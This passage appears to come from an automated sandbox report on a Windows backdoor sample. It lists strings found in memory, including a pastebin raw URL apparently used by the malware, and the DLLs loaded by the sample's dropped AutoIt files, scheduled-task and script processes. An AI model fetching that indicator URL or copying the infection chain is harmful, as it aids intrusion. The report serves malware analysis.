Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0 |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0 |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr |
String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0 |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr |
String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0 |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr |
String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr |
String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr |
String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0 |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0 |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0 |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0 |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://ocsp.digicert.com0 |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://ocsp.digicert.com0A |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://ocsp.digicert.com0C |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://ocsp.digicert.com0X |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr |
String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr |
String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr, Plugins.0.dr |
String found in binary or memory: http://ocsp2.globalsign.com/rootr306 |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr |
String found in binary or memory: http://ocsp2.globalsign.com/rootr606 |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr |
String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08 |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr |
String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0 |
Source: Telecom.pif, 0000000B.00000000.1216712688.0000000000515000.00000002.00000001.01000000.00000006.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, EcoScape.pif, 00000013.00000000.1232198341.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 0000001D.00000002.1397522322.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 00000027.00000000.1816275149.0000000000515000.00000002.00000001.01000000.00000009.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Commander.0.dr |
String found in binary or memory: http://www.autoitscript.com/autoit3/X |
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
String found in binary or memory: http://www.digicert.com/CPS0 |
Source: RegAsm.exe, 00000022.00000002.2442532871.0000000002D11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://pastebin.com/raw/Dh8E7H3R |
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr |
String found in binary or memory: https://www.autoitscript.com/autoit3/ |
Source: EcoScape.pif.11.dr, Plugins.0.dr |
String found in binary or memory: https://www.globalsign.com/repository/0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: dwmapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: oleacc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: shfolder.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: cmdext.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: framedynos.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: winsta.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: framedynos.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: winsta.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: wsock32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: napinsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: pnrpnsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: wshbth.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: nlaapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: winrnr.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\PING.EXE |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\PING.EXE |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\PING.EXE |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: taskschd.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: xmllite.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: jscript.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: twext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cscui.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: wsock32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: jscript.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: twext.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: cscui.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: wsock32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: mscoree.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: apphelp.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: aclayers.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: mpr.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: sfc.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: sfc_os.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: version.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe |
